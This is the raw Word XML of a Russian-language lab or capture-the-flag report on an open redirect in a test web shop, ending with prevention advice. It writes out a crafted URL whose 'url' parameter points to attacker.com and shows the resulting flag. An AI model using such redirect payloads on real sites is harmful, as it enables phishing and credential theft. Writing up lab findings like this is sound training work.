      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> Мы новички в этом деле, и нам нужна ваша помощь. Мы не хотим, чтобы наши клиенты пострадали от хакерских атак и потеряли свои деньги. Помогите нам понять, всё ли безопасно в нашем онлайн-сервисе.</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
        <w:t>Спасибо! Будем благодарны за отчёт!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C19624" w14:textId="77777777" w:rsidR="00715611" w:rsidRPr="006B3AE2" w:rsidRDefault="00715611" w:rsidP="00BB4760">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:ind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Общая информация:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A9B246" w14:textId="77777777" w:rsidR="00715611" w:rsidRPr="006B3AE2" w:rsidRDefault="00715611" w:rsidP="0071561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B3A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292769" w14:textId="77777777" w:rsidR="00715611" w:rsidRPr="006B3AE2" w:rsidRDefault="00715611" w:rsidP="0071561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B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Период тестирования: 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20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12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2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23720766" w14:textId="68E52B80" w:rsidR="00715611" w:rsidRPr="006B3AE2" w:rsidRDefault="00715611" w:rsidP="00EE669D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3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Объект тестирования: </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006B3AE2">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="00A928"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://51.250.73.193:8081</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B2AED79" w14:textId="77777777" w:rsidR="00715611" w:rsidRPr="006B3AE2" w:rsidRDefault="00715611" w:rsidP="00EE669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6892A127" w14:textId="00C4AE58" w:rsidR="00715611" w:rsidRPr="006B3AE2" w:rsidRDefault="00715611" w:rsidP="00BB4760">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind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Описание действий</w:t>
      </w:r>
      <w:r w:rsidR="00BB4760" w:rsidRPr="006B3A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решение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FD11A5A" w14:textId="77777777" w:rsidR="00B31291" w:rsidRPr="006B3AE2" w:rsidRDefault="00274982" w:rsidP="005B73EC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  <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Мы ищем на какой-либо странице перенаправление на </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, где есть параметр </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, где значение отлично от основного </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> сайта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40721781" w14:textId="77777777" w:rsidR="004453D5" w:rsidRPr="006B3AE2" w:rsidRDefault="00B31291" w:rsidP="004453D5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  <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Чтобы найти данную уязвимость необходимо начала “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>прокликать</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>” ссылки на сайте</w:t>
      </w:r>
      <w:r w:rsidR="004453D5" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1)</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EC513B" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7083207B" w14:textId="22701213" w:rsidR="008158A6" w:rsidRPr="006B3AE2" w:rsidRDefault="00EC513B" w:rsidP="004453D5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  <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Начнём с “</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Admin</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="004453D5" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2)</w:t>
      </w:r>
      <w:r w:rsidR="008158A6" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Мы видим форму для заполнения текстом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7B5419" w14:textId="58A27F34" w:rsidR="008158A6" w:rsidRPr="006B3AE2" w:rsidRDefault="00536311" w:rsidP="004453D5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  <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Features</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">” и </w:t>
      </w:r>
      <w:r w:rsidR="008158A6" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="008158A6" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Pricing</w:t>
      </w:r>
      <w:r w:rsidR="008158A6" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>” – ничего нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264C91C6" w14:textId="257326B4" w:rsidR="00D24B61" w:rsidRPr="006B3AE2" w:rsidRDefault="008158A6" w:rsidP="004453D5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  <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Заходим в “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Catalog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00536311" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004453D5" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r w:rsidR="00536311" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>на главной странице</w:t>
      </w:r>
      <w:r w:rsidR="00DB4C29" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> нажимаем “</w:t>
      </w:r>
      <w:r w:rsidR="00DB4C29" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Buy</w:t>
      </w:r>
      <w:r w:rsidR="00DB4C29" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00CF416A" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> и видим в адресной строке кроме основного адреса </w:t>
      </w:r>
      <w:r w:rsidR="00CF416A" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00CF416A" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> перенаправление на другой </w:t>
      </w:r>
      <w:r w:rsidR="00CF416A" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00CF416A" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> адрес</w:t>
      </w:r>
      <w:r w:rsidR="0068327D" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: http://194.87.248.4:8081/catalog?url=http://194.87.248.4:8081/pay/0</w:t>
      </w:r>
      <w:r w:rsidR="004453D5" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E92182F" w14:textId="77777777" w:rsidR="00D24B61" w:rsidRPr="006B3AE2" w:rsidRDefault="00D24B61" w:rsidP="004453D5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  <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Попробуем уязвимость </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>redirect</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> реализовать самостоятельно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070BFEAD" w14:textId="1049D29C" w:rsidR="005E5E54" w:rsidRPr="006B3AE2" w:rsidRDefault="00D24B61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B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Заходим в “</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Admin</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>” и заполняем форму</w:t>
      </w:r>
      <w:r w:rsidR="004453D5" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5)</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005B44AA" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> В поле “</w:t>
      </w:r>
      <w:r w:rsidR="005B44AA" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:r w:rsidR="005B44AA" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">” вставляем </w:t>
      </w:r>
      <w:r w:rsidR="005B44AA" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="005B44AA" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> адрес, который м нашли с перенаправлением, но вторую часть заменяем на какой-либо </w:t>
      </w:r>
      <w:r w:rsidR="005B44AA" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="004453D5" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> – н</w:t>
      </w:r>
      <w:r w:rsidR="005E5E54" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>апример</w:t>
      </w:r>
      <w:r w:rsidR="004453D5" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005E5E54" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> так: http://194.87.248.4:8081/catalog?url=http://</w:t>
      </w:r>
      <w:r w:rsidR="005E5E54" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidR="005E5E54" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005E5E54" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE6986E" w14:textId="543AACA9" w:rsidR="00A17925" w:rsidRPr="006B3AE2" w:rsidRDefault="005B44AA" w:rsidP="004453D5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  <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>После отправки запроса мы получаем флаг</w:t>
      </w:r>
      <w:r w:rsidR="004453D5" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (6)</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00A17925" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D74B302" w14:textId="649ED1E1" w:rsidR="005B44AA" w:rsidRPr="006B3AE2" w:rsidRDefault="00A17925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  <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{Subm1t_0p3n_r3d1r3ct}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F10049" w14:textId="5A9E7ED6" w:rsidR="00274982" w:rsidRPr="006B3AE2" w:rsidRDefault="00B31291" w:rsidP="00D13013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B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00274982" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7219DC5F" w14:textId="7D514426" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00A17925">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC0880E" w14:textId="24EE051F" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00536311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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4A883A1C" wp14:editId="7585B141">
            <wp:extent cx="5733415" cy="1313815"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"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B64D" w14:textId="56DA94DE" w:rsidR="00A17925" w:rsidRPr="006B3AE2" w:rsidRDefault="00A17925">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51034ED8" w14:textId="693FBD21" w:rsidR="00536311" w:rsidRPr="006B3AE2" w:rsidRDefault="00536311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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5F322F91" wp14:editId="721B9F59">
            <wp:extent cx="5733415" cy="2760345"/>
            <wp:effectExtent l="0" t="0" r="63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E062" w14:textId="77777777" w:rsidR="00A17925" w:rsidRPr="006B3AE2" w:rsidRDefault="00A17925">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DFD08C8" w14:textId="7087D82B" w:rsidR="00847588" w:rsidRPr="006B3AE2" w:rsidRDefault="00A17925">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EEC5FD" w14:textId="5ED23FBF" w:rsidR="00847588" w:rsidRPr="006B3AE2" w:rsidRDefault="00847588">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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0C1EF64F" wp14:editId="1EC0D8E1">
            <wp:extent cx="5733415" cy="204533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6584" w14:textId="1FB8E5B2" w:rsidR="0068327D" w:rsidRPr="006B3AE2" w:rsidRDefault="0068327D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1350AC31" w14:textId="7A6568AA" w:rsidR="00A17925" w:rsidRPr="006B3AE2" w:rsidRDefault="00A17925">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C037F1D" w14:textId="37F5BAE3" w:rsidR="0068327D" w:rsidRPr="006B3AE2" w:rsidRDefault="0068327D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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36328D9D" wp14:editId="2BF46162">
            <wp:extent cx="5733415" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="12" name="Рисунок 1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5B52" w14:textId="0D2F5639" w:rsidR="005E5E54" w:rsidRPr="006B3AE2" w:rsidRDefault="005E5E54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54988A54" w14:textId="02469D35" w:rsidR="001360A5" w:rsidRPr="006B3AE2" w:rsidRDefault="001360A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0B7EBA" w14:textId="2A0673E3" w:rsidR="005E5E54" w:rsidRPr="006B3AE2" w:rsidRDefault="005E5E54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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74EC07C9" wp14:editId="56861C44">
            <wp:extent cx="5733415" cy="2726055"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="13" name="Рисунок 1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E75A" w14:textId="6CAEBC76" w:rsidR="00A17925" w:rsidRPr="006B3AE2" w:rsidRDefault="00A17925">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0680F228" w14:textId="5B21697B" w:rsidR="001360A5" w:rsidRPr="006B3AE2" w:rsidRDefault="001360A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB16FE8" w14:textId="59B6E8D2" w:rsidR="00A17925" w:rsidRPr="006B3AE2" w:rsidRDefault="00A17925">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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151D989A" wp14:editId="2B74032B">
            <wp:extent cx="5514975" cy="1552575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="14" name="Рисунок 1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957B" w14:textId="3E0AFB23" w:rsidR="00BE544A" w:rsidRPr="006B3AE2" w:rsidRDefault="00BE544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Рекомендации, к</w:t>
      </w:r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ак </w:t>
      </w:r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предотвратить открытое перенаправление:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58993CE7" w14:textId="77777777" w:rsidR="00EF445B" w:rsidRPr="006B3AE2" w:rsidRDefault="00EF445B" w:rsidP="00EF445B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0FC82F03" w14:textId="77777777" w:rsidR="001C1E0A" w:rsidRPr="006B3AE2" w:rsidRDefault="00EF445B" w:rsidP="00EF445B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  <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Самый безопасный способ предотвратить уязвимости открытого перенаправления: не использовать перенаправления в ваших веб-приложениях. </w:t>
      </w:r>
    </w:p>
